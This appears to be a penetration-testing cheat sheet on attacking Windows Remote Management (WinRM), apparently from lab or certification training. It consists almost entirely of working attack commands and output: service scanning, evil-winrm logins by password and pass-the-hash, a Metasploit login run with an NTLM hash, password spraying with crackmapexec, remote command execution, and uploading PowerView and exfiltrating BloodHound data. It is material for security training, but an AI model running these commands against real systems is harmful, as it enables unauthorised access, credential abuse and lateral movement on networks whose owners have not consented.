WinRM (5985, 5986)
Nmap
nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n
Connect
evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!
With an NT hash (pass-the-hash)
evil-winrm -u "$USER" -H "$NT_HASH" -i "$TARGET"
With docker
docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 10.129.111.232 -u Administrator -p 'password'
Metasploit
msf6 auxiliary(scanner/winrm/winrm_login) > set rhosts 192.168.210.17
rhosts => 192.168.210.17
msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME Administrator
USERNAME => Administrator
msf6 auxiliary(scanner/winrm/winrm_login) > set DOMAIN internal.zsm.local
DOMAIN => internal.zsm.local
msf6 auxiliary(scanner/winrm/winrm_login) > set PASSWORD aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
PASSWORD => aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
msf6 auxiliary(scanner/winrm/winrm_login) > run
[!] No active DB -- Credential data will not be saved!
[+] 192.168.210.17:5985 - Login Successful:
Netexec - CME
$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list
WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)
WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman
WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)
Command execution
[Apr 09, 2024 - 01:22:53 (EDT)] exegol-CPTS /workspace # nxc winrm 10.129.202.136 -u john -p november -X 'dir c:\'
SMB 10.129.202.136 445 WINSRV [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM 10.129.202.136 5985 WINSRV [+] WINSRV\john:november (admin)
WINRM 10.129.202.136 5985 WINSRV [+] Executed command (shell type: powershell)
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV Directory: C:\
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV
WINRM 10.129.202.136 5985 WINSRV Mode LastWriteTime Length Name
WINRM 10.129.202.136 5985 WINSRV ---- ------------- ------ ----
WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM PerfLogs
WINRM 10.129.202.136 5985 WINSRV d-r--- 12/14/2020 6:38 PM Program Files
WINRM 10.129.202.136 5985 WINSRV d----- 2/11/2022 6:10 AM Program Files (x86)
WINRM 10.129.202.136 5985 WINSRV d-r--- 1/6/2022 6:49 AM Users
WINRM 10.129.202.136 5985 WINSRV d----- 12/14/2020 7:11 PM Windows
WINRM 10.129.202.136 5985 WINSRV
[Apr 09, 2024 - 01:23:02 (EDT)] exegol-CPTS /workspace #
Upload
*Evil-WinRM* PS C:\Users\Administrator\Documents> upload PowerView.ps1 C:\Users\Administrator\Desktop
Download
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download 20240308092156_BloodHound.zip